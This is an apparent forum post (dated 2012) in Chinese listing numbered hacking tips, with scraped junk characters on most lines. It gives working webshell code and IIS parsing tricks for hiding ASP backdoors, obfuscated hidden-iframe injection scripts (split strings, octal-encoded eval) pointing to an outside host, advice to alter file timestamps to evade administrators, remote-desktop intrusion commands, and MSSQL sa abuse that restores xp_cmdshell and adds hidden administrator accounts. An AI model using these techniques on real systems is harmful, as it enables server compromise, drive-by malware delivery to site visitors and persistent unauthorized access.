5 O7 {8 K1 S$ {# m* u% O* c3 f* u5 |& s" r- q+ c1 H, V: a% x) L
52、at "12:17" /interactive cmd$ {1 H& ], C* N+ E }& U
执行后可以用AT命令查看新加的任务: @+ W3 t: q; d- B- @& \) j/ @
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
7 P' u3 [" c' m+ u; r8 }- F3 A2 @) k. K
53、隐藏ASP后门的两种方法
; @9 Y/ c% k- W; ?1、建立非标准目录:mkdir images..\: f' ?+ m3 q& Z
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
- ]+ Y: q3 r; ~; W通过web访问ASP木马:http://ip/images../news.asp?action=login
' _$ F$ W" x I* d- d- ~, U如何删除非标准目录:rmdir images..\ /s
' D. ]- ^+ c7 j* W( L# A2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:1 E$ F+ _8 ?' R' a5 L
mkdir programme.asp$ i* P& _( a3 _8 z& K
新建1.txt文件内容:<!--#include file=”12.jpg”-->8 y$ @: W* \, j' H3 }% P, S
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件" Q* Z" V5 l# G* P6 r" s3 P$ s
attrib +H +S programme.asp
& c* _" i6 w! X7 l( r7 U+ l7 M) `通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt, a( R. `- T1 q- J6 G
" `! V# ]* a# D# |$ ^1 j4 F
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
- ^, w5 X) ? A' o) C$ m, D/ z2 `然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
! A6 f" J4 ^5 v3 s" y8 [2 Q9 z) U1 R1 {0 P5 ]: u- M7 J6 U) L
55、JS隐蔽挂马+ M* O6 X% j3 Q& I8 n9 _1 H9 {' H
1.
, L) G5 S- D( }var tr4c3="<iframe src=ht";! f) e7 u* u) P4 t. R
tr4c3 = tr4c3+"tp:/";
$ z% Y! H5 [: j6 H, xtr4c3 = tr4c3+"/ww";
; I4 b1 a) `/ H9 g6 h* Z/ str4c3 = tr4c3+"w.tr4";
9 x D+ S( U0 M. T( i" T! `tr4c3 = tr4c3+"c3.com/inc/m";, u6 ]) b: ` S M7 o
tr4c3 = tr4c3+"m.htm style="display:none"></i";
0 [7 Y5 O0 f0 h& M& e: Y9 qtr4c3 =tr4c3+"frame>'";0 S. Y8 C! {1 V0 V
document.write(tr4c3);
! }! l9 ^6 ^8 @. G% ]/ k避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
2 J1 M( Z8 ?& v/ z5 w
) x5 w* s! m& J6 h: z+ {2.$ ~) z1 @, \9 X ]# p' x- i! |
转换进制,然后用EVAL执行。如
. V1 H; X' |0 K( feval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
7 I7 S- N5 O. v# l7 ]) y不过这个有点显眼。
$ s9 ?* E0 I U3.
5 }7 U: V) L. M8 ldocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
5 c. y: Z( g$ w4 W: U" o5 x# J最后一点,别忘了把文件的时间也修改下。3 w, x. L0 W1 M; S1 U% b
6 Y1 X, Z. A2 X% u56.3389终端入侵常用DOS命令0 w' K3 @" M+ ~* E
taskkill taskkill /PID 1248 /t' G# ]; u" w! a5 ~
$ i( g8 j* L* J! h' U) B, b1 e' O9 jtasklist 查进程* G8 P) p* }+ x5 K
, G0 M) J% t; z/ ^9 C' Scacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; o% r, k, p# `6 E0 \3 z; ]iisreset /reboot2 `( d3 m: y* a7 [. X1 N) h4 k9 l
tsshutdn /reboot /delay:1 重起服务器
3 {, u6 \* {3 i: H* L: `1 B1 Y! y/ k( E
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
' V! P+ K H [" B: R" z) [- J ~5 S
query user 查看当前终端用户在线情况& N* Z3 d5 Q* o4 u9 B7 S
7 y* [% T( G% y1 s要显示有关所有会话使用的进程的信息,请键入:query process *- U/ m; r/ }; U# _& M1 ]+ w- P
! o6 G2 N0 e" m1 x' f c5 H, Q c
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
# n+ d. F3 S: I! G$ a" D! F2 l
( P7 z) q* t' H$ s- W, ^) I要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
% m0 p' q( B, u, K7 v; R9 f( I* X2 H$ t4 Z* D' [5 ^. l ?- Y
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
, _) O% M; V5 F/ |0 Q2 o8 U- B: r" k) u: M; Z$ S
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
/ p. W9 }9 j+ Y/ A$ z+ B& t4 r- \% d2 Y7 I
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
# k5 m- o, f) S: m. R+ i1 ]
. J! Z2 M( G, _) s/ ]$ x命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
7 C& I8 |" \9 v- f' \
1 f: {( k2 T3 u命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
( k) l8 c5 L1 u0 ?0 ~& v6 T6 K& E/ }+ f3 b7 e7 [
56、在地址栏或按Ctrl+O,输入:; t$ j" ~. D, n- [8 k6 o
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;4 a7 g1 h' T) G: H6 e5 C
|, c- w0 }4 X( z$ }+ E$ N源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。) Q% |" n- |$ B3 V
S5 Z' s" F2 a+ K57、net user的时候,是不能显示加$的用户,但是如果不处理的话,3 n* }* B2 g% u
用net localgroup administrators是可以看到管理组下,加了$的用户的。
! x/ s1 N- c0 o" C
* a9 w2 {1 R1 f R8 G1 q' k58、 sa弱口令相关命令
! o8 ?( n$ C8 `
. t0 x; R3 ^+ w. F一.更改sa口令方法:
: M# A2 B0 C2 c用sql综合利用工具连接后,执行命令:, L. q5 P; L& v: \1 }$ o [% m
exec sp_password NULL,'20001001','sa'5 x$ y8 @3 h% _" }& F3 F- F0 V
(提示:慎用!). h4 G' l, S0 x$ d
$ r; C3 D8 R# [6 p二.简单修补sa弱口令.: u" p; `* D9 G: `3 B2 h! W, o
& S# ?9 E6 ]; `( {
方法1:查询分离器连接后执行:( H* w$ d% w7 J% s! \
if exists (select * from3 o e- }7 _" T" m; c4 V% u
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
4 V8 w, y6 }8 A6 gOBJECTPROPERTY(id, N'IsExtendedProc') = 1)! J: r8 r2 Q8 }* b, o! a4 i1 u. a- @
1 f2 u# i6 F* z [: ]' P
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
. H9 U& H) v, Z& g+ X5 J7 X o; Z2 R7 Z8 X$ z' u& k
GO0 P( I+ E! ]& C: x! z
3 U" U# E2 q7 C) B9 L然后按F5键命令执行完毕
; d- Z3 ~3 q3 D0 Y! [3 p- @1 G* O- Q7 H7 l% L7 c+ u. j
方法2:查询分离器连接后
0 J9 `3 g4 Y3 x0 Y! l( P5 f第一步执行:use master! f- z1 |4 J. O, Z0 I
第二步执行:sp_dropextendedproc 'xp_cmdshell'" [7 H0 }! V7 w- @
然后按F5键命令执行完毕7 _' ^( Q6 Z, G2 w
# a$ ?0 | Q h0 N+ E2 V. d" t$ A1 d- R
三.常见情况恢复执行xp_cmdshell., R5 R5 J* W' q0 m) J/ {. ]
+ U& {5 S$ {4 d, A
/ I9 o$ I0 ]+ f: ^; e) M. L
1 未能找到存储过程'master..xpcmdshell'.
6 G" i$ V: `, \$ [, N0 L 恢复方法:查询分离器连接后,
+ e& y1 ?+ V( P$ \* J4 W第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int1 F0 @, j. G6 |
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'/ i/ d! x j4 |
然后按F5键命令执行完毕/ v& p0 ?; e! u
2 Q4 C6 r2 W9 I' x% G. I/ V
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
% G5 q( A/ M* E# B: ~; y* F4 I$ d恢复方法:查询分离器连接后,
7 p; h, L8 N1 t/ e第一步执行:sp_dropextendedproc "xp_cmdshell"
+ _8 _9 @2 y; T1 c3 k- S: T) p第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( m* V* s$ B% y; O. a, ?0 r然后按F5键命令执行完毕
/ F7 y# y7 ]. w$ H# r; ^! X. W8 @6 a% R
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
! M1 ~* z N$ L% p# N" Y8 d: |6 K恢复方法:查询分离器连接后,' W6 }8 s1 \) _! |, q {
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'! {, X5 ^& a- `
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
3 U1 C2 G6 X& U+ | R8 ^) y然后按F5键命令执行完毕 I! j3 K: Z. ^+ N! T
6 A; n6 H- V5 H: [( F* p7 T6 K+ m X四.终极方法.
W/ H( A( F5 p/ n如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
]) O( {9 j3 D; X t: \" Q) t9 S查询分离器连接后,
4 x1 T4 g* y! T& F* ?2000servser系统:1 N$ b- J) C1 L
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add' U5 B. G1 r- _ W% `* v: C! y& p* @: X
( K0 w& y6 {3 G4 w# f2 x, x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'( n3 E) Y0 A8 ^: o/ ?. l
2 x/ e1 s" I! G
xp或2003server系统:7 v& s# w/ C" T, _% z- ]: a
8 h( r. `8 R' ^declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
" A- n* q4 W2 N; |/ u
5 T! b/ V, N) i, I# Mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'4 c2 Q6 m7 O2 K. {0 h' `& t
|
发表于 2012-9-15 14:13:15
收藏
支持
反对